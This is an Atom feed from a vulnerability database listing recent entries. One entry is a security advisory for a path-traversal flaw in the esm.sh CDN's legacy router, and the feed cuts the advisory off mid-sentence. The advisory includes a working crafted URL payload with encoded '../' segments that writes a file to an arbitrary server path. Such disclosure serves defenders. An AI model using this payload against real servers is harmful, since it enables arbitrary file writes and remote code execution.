<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-05T07:57:48.195986+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-323948</id>
    <title>EUVD-2026-323948</title>
    <updated>2026-10-05T07:57:48.200053+00:00</updated>
    <content>EUVD-2026-323948</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-323948"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-44593</id>
    <title>fkie_cve-2026-44593</title>
    <updated>2026-10-05T07:57:48.200093+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>esm.sh is a no-build content delivery network (CDN) for web development. In 137 and earlier, the legacy router first retrieves a response from legacyServer, parses the incoming request path, and ultimately writes the data to storage via buildStorage.Put. The router concatenates the path components without sanitizing them, producing a storage key. When this key is used, the underlying file system resolves the relative segments and writes the file to the specified path. Thus an attacker can craft a request that writes data to arbitrary locations on the server.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-44593"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-3636-h3vx-6465</id>
    <title>GHSA-3636-h3vx-6465 — esm.sh: Legacy Route Path Traversal Can Lead to RCE</title>
    <updated>2026-10-05T07:57:48.200136+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Go: github.com/esm-dev/esm.sh</p>
<p>### Impact
- Arbitrary File Write – An attacker can cause the server to write data to any file path it has write permission for.
- Privilege Escalation / RCE – By overwriting critical binaries or scripts, the attacker can execute arbitrary code with the server’s privileges.</p>
<p>### Exploit</p>
<p>The legacy router first retrieves a response from `legacyServer`, parses the incoming request path, and ultimately writes the data to storage via `buildStorage.Put`  
(see &lt;https://github.com/esm-dev/esm.sh/blob/4312ae93e518121e764a18bb521af12e490ef137/server/legacy_router.go#L291&gt;).</p>
<p>For a URL such as:</p>
<p>```
http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/&lt;attacker&gt;/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned
```</p>
<p>the router concatenates the path components without sanitizing them, producing a storage key like:</p>
<p>```
legacy/v111/react@19.2.0/esnext/../../../gh/&lt;attacker&gt;/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned
```</p>
<p>When this key is used, the underlying file system resolves the relative segments and writes the file to `/tmp/pwned`. Thus an attacker can craft a request that writes data to arbitrary locations on the server.</p>
<p>### Details</p>
<p>1. **URL Construction**  
   A crafted request is sent to the server:
   ```
   http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/&lt;attacker&gt;/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned
   ```</p>
<p>2. **Proxy to Legacy Server**  
   The request is forwarded t…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-3636-h3vx-6465"/>
  </entry>
</feed>
